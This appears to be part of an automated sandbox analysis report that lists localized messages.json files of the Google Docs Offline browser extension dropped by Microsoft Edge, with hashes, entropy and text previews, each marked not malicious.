                                                                                                                                                                                                                                                                              SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                              MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                              SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                              SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                              SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                              Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                              MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                              SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                              SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                              SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                              MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                              SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                              SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                              SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2766
                                                                                                                                                                                                                                                                              Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                              MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                              SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                              SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                              SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):978
                                                                                                                                                                                                                                                                              Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                              MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                              SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                              SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                              SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                                                                                              Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                              MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                              SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                              SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                              SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                              Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                              MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                              SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                              SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                              SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):937
                                                                                                                                                                                                                                                                              Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                              MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                              SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                              SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                              SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1337
                                                                                                                                                                                                                                                                              Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                              MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2846
                                                                                                                                                                                                                                                                              Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                              MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):934
                                                                                                                                                                                                                                                                              Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                              MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                              SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                              SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                              SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                              MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                              SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                              SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                              SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                              Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                              MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                              SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                              SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
